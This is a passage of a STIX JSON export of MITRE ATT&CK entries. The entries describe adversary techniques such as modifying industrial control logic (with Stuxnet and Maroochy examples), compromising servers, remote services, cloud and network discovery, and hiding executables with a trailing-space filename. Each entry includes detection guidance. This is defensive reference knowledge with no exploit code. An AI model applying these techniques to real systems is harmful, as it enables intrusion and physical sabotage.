in some cases to other infected devices within the network.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0869", "external_id": "T0869"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Modify Control Logic", "description": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. \n\nProgram code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active.\n\nAn adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools.\n\nAn adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. \n\nIt is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the \u201creal\u201d pressure is for given analog signals and then automatically linearize the measurement to what would be the \u201creal\u201d pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be \u201ccorrected\u201d during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. (Citation: Stuxnet - Langner - 201311)\n\nIn the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Safety Instrumented System/Protection Relay", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0833", "external_id": "T0833"}, {"source_name": "Stuxnet - Langner - 201311", "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf"}, {"source_name": "Maroochy - MITRE - 200808", "description": "Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study\u2013 Maroochy Water Services, Australia. Retrieved March 27, 2018.", "url": "https://www.mitre.org/sites/default/files/pdf/08%201145.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-31T20:05:44.075Z", "name": "Server", "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Dor Edry, Microsoft"], "x_mitre_deprecated": false, "x_mitre_detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", "created": "2020-10-01T00:56:25.135Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/004", "external_id": "T1584.004"}, {"source_name": "TrendMicro EarthLusca 2022", "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca\u2019s Operations. Retrieved July 1, 2022.", "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"}, {"source_name": "Koczwara Beacon Hunting Sep 2021", "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"}, {"source_name": "Mandiant SCANdalous Jul 2020", "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:12.125Z", "name": "Remote Services", "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Daisuke Suzuki"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Module: Module Load", "Logon Session: Logon Session Creation", "Process: Process Creation", "Command: Command Execution", "Network Traffic: Network Connection Creation", "Network Share: Network Share Access"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "created": "2021-04-12T19:26:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0886", "external_id": "T0886"}, {"source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"}, {"source_name": "CISA AA21-201A Pipeline Intrusion July 2021", "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf"}, {"source_name": "Dragos December 2017", "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf"}, {"source_name": "Joe Slowik April 2019", "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Cloud Service Discovery", "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Suzy Schapperle - Microsoft Azure Red Team", "Praetorian", "Thanabodi Phrakhun, I-SECURE"], "x_mitre_deprecated": false, "x_mitre_detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Office 365", "SaaS", "IaaS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", "created": "2019-08-30T13:01:10.120Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1526", "external_id": "T1526"}, {"source_name": "Azure AD Graph API", "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.", "url": "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview"}, {"source_name": "Azure - Resource Manager API", "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.", "url": "https://docs.microsoft.com/en-us/rest/api/resources/"}, {"source_name": "Azure - Stormspotter", "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.", "url": "https://github.com/Azure/Stormspotter"}, {"source_name": "GitHub Pacu", "description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.", "url": "https://github.com/RhinoSecurityLabs/pacu"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Space after Filename", "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to \"evil.txt \" (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back). \n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Erye Hernandez, Palo Alto Networks"], "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1151", "external_id": "T1151"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/649.html", "external_id": "CAPEC-649"}, {"source_name": "Mac Backdoors are back", "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-05-08T20:13:24.241Z", "name": "I/O Module Discovery", "description": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0824", "external_id": "T0824"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:12.329Z", "name": "Denial of Control", "description": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nIn the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0813", "external_id": "T0813"}, {"source_name": "Corero", "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"}, {"source_name": "Mark Loveless April 2017", "description": "Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 2020/11/06 ", "url": "https://duo.com/decipher/the-dallas-county-siren-hack"}, {"source_name": "Michael J. Assante and Robert M. Lee", "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"}, {"source_name": "Tyson Macaulay", "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-08-14T19:08:59.741Z", "name": "Remote System Discovery", "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).\n\nAdversaries may also analyze data from local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) \n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Daniel Stepanic, Elastic", "RedHuntLabs, @redhuntlabs", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "3.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "created": "2017-05-31T21:30:28.187Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1018", "external_id": "T1018"}, {"source_name": "CISA AR21-126A FIVEHANDS May 2021", "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.", "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"}, {"source_name": "Elastic - Koadiac Detection with EQL", "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-11T21:10:09.547Z", "name": "Network Service Discovery", "description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021) \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host\u2019s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS", "Containers", "Network"], "x_mitre_version": "3.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "created": "2017-05-31T21:30:43.915Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1046", "external_id": "T1046"}, {"source_name": "apple doco bonjour description", "description": "Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.", "url": "https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html"}, {"source_name": "CISA AR21-126A FIVEHANDS May 2021", "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.", "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"}, {"source_name": "macOS APT Activity Bradley", "description": "Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.", "url": "https://themittenmac.com/what-does-apt-activity-look-like-on-macos/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-21T14:32:05.257Z", "name": "Domain Properties", "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", "created": "2020-10-02T15:46:24.670Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590/001", "external_id": "T1590.001"}, {"source_name": "Circl Passive DNS", "description": "CIRCL Computer Incident Response 